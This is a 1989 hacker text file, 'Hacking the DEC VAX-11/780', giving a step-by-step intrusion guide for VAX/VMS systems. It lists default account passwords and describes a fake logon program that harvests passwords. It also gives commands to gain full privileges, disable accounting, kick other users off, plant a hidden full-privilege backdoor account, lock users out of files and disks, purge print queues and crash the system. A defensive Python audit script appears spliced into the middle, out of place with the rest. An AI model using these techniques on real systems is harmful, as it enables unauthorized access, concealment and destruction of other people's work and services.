VAXHACK.TXT | Text File | 1989-05-20 | 9KB | 196 lines
Hacking the DEC VAX-11/780 For Phun and Profit
By..... The Nuclear Wastoid
So, you say you want to learn how to hack the VAX-11/780. This
phile contains all you need to know to wreak massive havoc and have
major fun. This phile is divided into five sections, which are:
1. Getting On
2. Staying On
3. Basics
4. Having Fun
5. Shutting Down and Getting Off
Each is pretty much self-explanatory, so here goes:
PART I. Getting On.
There are 2 techniques to getting on the system: Hit and Miss, or
random passwords, and Cheating. We will, of course, deal with
cheating. To cheat yourself onto the system, you can either: 1. use
someone else's password, or 2. use a default password.
1. Using Someone Else's Password
Using someone else's password can
be both good and bad. It's good because you don't have to create a
new account or use a restricted one, so the sysop won't see anything
out of the ordinary. It's bad because the person may notice that
someone else has been on the system with his pass when he wasn't on
the system. It's also not very good because the person may not have
high enough privilege for your needs. To get someone's password is
simple if you can get onto the system, even with limited access. Just
log onto the sysop's (or someone else with high enough privilege) and
write a program that just sits there and looks like the logon prompt.
Have the program output the names + passes it gets to a remote printer
or a file that you can get to later, and then kill itself.
2. Defaults. There are four default accounts placed on the VAX
when it is first set up. These can be changed or deleted, but usually
one or two survive. The defaults are:
Name        Password
---------------------------------------------------
SYSTEM      MANAGER or OPERATOR
FIELD       SERVICE or TEST
DEFAULT     USER or DEFAULT
SYSTEST     UETP or SYSTEST
I have found that FIELD SERVICE works most often.
Once you're on the system, you want to make yourself able to do the
most damage. To do this, type:
$ SET PROC/PRIV=ALL - '$' is the system prompt
If the system responds with some bullshit about your privilege
not being high enough, GET ANOTHER PASSWORD. You need full access to
have enough phun.
PART II. Staying On.
Okay, you're on the system. Now what? Mass destruction, of course.
But first, make sure you'll be able to get back on. The first thing
you want to do is:
$ SET ACCOUNTING/DISABLE
This stops the system from keeping track of you. Now type:
$ SHOW USERS
to see who is on the system. If you see your account listed twice,
log off. You don't want to be caught because of something stupid like
that. If you want to make sure that nobody can interfere with your
phun, you should type:
$ SET LOGINS/INTERACTIVE=0
This keeps anybody else from logging onto the computer. Now to kick
everybody else off:
$ SHOW USERS - the system responds with something like:
          VAX/VMS INTERACTIVE USERS
           23-JUL-1986 09:37:15.54
Total number of interactive users= 6
Username     Process Name   PID        Terminal
BRUNO        BRUNO          0000026B   TTD3:
FIELD        FIELD          00000FF2   TTC2:
JOHNSON      _TTD5:         0000026D   TTD5:
LINCOLN      LINCOLN        0000026A   TTD2:
CYBERPUNK    CYBERPUNK      000001D8   TTD4:
HARDCORE     HARDCORE       00000263   TTC0:
Now, if you logged on as FIELD, you want to go through and type:
$ STOP/ID=PID - substituting the number in the PID column for PID
for each person other than you. This kicks everybody else off the
system. It's best if you only do this at night or when usage is low,
because if the sysop gets lots of complaints he might catch you.
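Seen from the operator's side, the SHOW USERS listing above doubles as an audit record. The following is an added example, not part of the original phile: it parses that listing format and flags interactive sessions under the four default account names from Part I, any account logged in more than once, and a header count that disagrees with the rows. The function names, the second BRUNO row and its PID are constructed for illustration.

```python
import re
from collections import Counter

# Account names the text lists as factory defaults.
DEFAULT_ACCOUNTS = {"SYSTEM", "FIELD", "DEFAULT", "SYSTEST"}

# Data row: username, process name, 8-hex-digit PID, terminal ending in ':'.
ROW = re.compile(r"^\s*(\S+)\s+(.+?)\s+([0-9A-Fa-f]{8})\s+(\S+:)\s*$")
TOTAL = re.compile(r"Total number of interactive users\s*=\s*(\d+)")

def parse_show_users(text):
    """Return (stated_total, rows) from captured SHOW USERS output."""
    stated, rows = None, []
    for line in text.splitlines():
        if (m := TOTAL.search(line)):
            stated = int(m.group(1))
        elif (m := ROW.match(line)):
            user, proc, pid, term = m.groups()
            rows.append((user.upper(), proc, pid.upper(), term))
    return stated, rows

def review_sessions(text):
    """Return (finding, detail) tuples for an operator to follow up."""
    stated, rows = parse_show_users(text)
    findings = []
    for user, _, pid, term in rows:  # login under a factory-default account
        if user in DEFAULT_ACCOUNTS:
            findings.append(("default-account-session", f"{user} on {term} PID {pid}"))
    for user, n in Counter(r[0] for r in rows).items():
        if n > 1:  # same account on more than one terminal at once
            findings.append(("concurrent-sessions", f"{user} x{n}"))
    if stated is not None and stated != len(rows):  # truncated or edited capture
        findings.append(("row-count-mismatch", f"{stated} != {len(rows)}"))
    return findings

# Constructed sample modeled on the listing in the text; the last row is invented.
SAMPLE = """\
Total number of interactive users= 5
Username   Process Name  PID       Terminal
BRUNO      BRUNO         0000026B  TTD3:
FIELD      FIELD         00000FF2  TTC2:
JOHNSON    _TTD5:        0000026D  TTD5:
LINCOLN    LINCOLN       0000026A  TTD2:
BRUNO      BRUNO_1       00000270  TTC1:
"""

if __name__ == "__main__":
    print(*review_sessions(SAMPLE), sep="\n")
```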
The next thing you want to do is make sure that you will be able to
get back onto the system next time. To do this, type:
$ SET DEF SYS$SYSROOT:[SYSEXE]
This takes you to the SYSEXE directory of the SYS$SYSROOT drive.
Now type:
$ RUN AUTHORIZE - the system will respond:
UAF> - now type:
UAF> ADD WASTOID /PASSWORD=ZEDNET /UIC=[099,900] /CPUTIME=0- <cr>
/DEVICE=SYS$SYSROOT /DIRECTORY=[SYSEXE] /PRIVS=ALL /NOACCOUNTING <cr>
UAF> EXIT <cr>
Now- what does this mean?
ADD WASTOID - adds new record with name=WASTOID
/PASSWORD=ZEDNET - sets password for new account
/UIC=[099,900] - sets user identification code for new account
/CPUTIME=0 - tells system you can use it anytime
the '-' after /CPUTIME=0 tells the computer that you're starting a new line.
/DEVICE=SYS$SYSROOT - sets your home drive
/DIRECTORY=[SYSEXE] - sets your home directory
/PRIVS=ALL - give yourself full access
/NOACCOUNTING - so the system can't keep track of you
Okay. Now you'll be able to get back on. On to ...
PART III. System Basics
Here are some commands you need to know if you haven't ever used a
Vax:
HELP - this brings up a list of all commands, and will explain any
of them for you.
SET DEF drive:[directory.sub1.sub2] - sets default drive and
directory.
TYPE or T - types a file to the screen. In the format: T FILENAME.EXT
PRINT or PR - prints a file to the printer. In the format: PR FILENAME.EXT
DIR or D - directory
D - shows name, size, protection
DIR/PRINT or D/PRINT - outputs the directory to printer + screen.
RUN or R - executes .EXE files: R FILENAME.EXE
@ - executes .COM files: @FILENAME.COM
Okay, now you're ready for:
PART IV: Having Fun.
A. Files
It has got to be the greatest feeling in the world to lock somebody out of
his own files. This is hilarious to do, especially if you can watch the
person when he finds out. To do this, you use the SET PROTECTION command.
Let's say that you want to lock everybody but yourself out of a file called
TEST.FIL. You would type:
$ SET PROT=(S:RWED,O,G,W) TEST.FIL
This gives you (the system) full rights, while everybody else (owner, group,
and world) has no access rights.
B. Disks
The next most fun thing to do is to lock everybody off of whole
disks at a time. To do this to drive DMA1:, you type:
$ DISMOUNT DMA1: - take DMA1: out of service
$ DEALLOCATE DMA1: - take DMA1: off line
$ SET PROT=(S,O:R,G,W)/DEVICE/OWNER_UIC[099,900] DMA1:
- this tells the system that DMA1: is a private drive of yours.
$ ALLOCATE DMA1: - bring DMA1: back on line
$ MOUNT DMA1: - put DMA1: back in service.
SHAZAM!! your own personal drive that nobody else can use.
C. Printers
Say you want to print a file called HACKING.DAT. You type :
$ PR HACKING.DAT
and the system responds that your file is 'pending' on LPA0:. This
means that some asshole just put a 1000 page file into the print
queue, so your little file won't print until next Tuesday. What you
do is:
$ STOP/ABORT LPA0:
This makes the printer stop its current job and kick it off the
queue. Now:
$ DELETE/QUEUE LPA0:
This kills everything that was on the queue. Wow! A whole printer
to yourself!
Anyway, now I'll leave you alone. I'm sure you can find more ways
of having fun on your own, so I'll leave them to you. Oh, by the way- don't skip ....
PART V: Shutting Down and Getting Off
Now say that the system is going to explode in 30 seconds if it's
not shut down. Well, being the good samaritan that you are, you'll
just have to shut it down for them. There are two quick-and-dirty
ways that DEC provided for just such an occasion. #1 works, but #2 is
faster and looks nicer.
1. OPCCRASH.
To shut down the system with the OPCCRASH command, simply
$ RUN SYS$SYSTEM:OPCCRASH - the system will respond:
SYSTEM SHUTDOWN COMPLETE- USE CONSOLE TO HALT SYSTEM
now type:
^P - the system will respond:
>>> - type:
>>> HALT - the system will respond:
HALTED AT 8000708A - or whatever
2. CRASH system command
To shut down the system with the CRASH command, simply type:
^P
>>> HALT
>>> @CRASH - this executes the system command CRASH and displays a big error
listing. Neat, eh?
Now you can do everything, except log off, so here goes:
$ LO
WASTOID logged out at 23-JUL-1986 10:27:13.20
$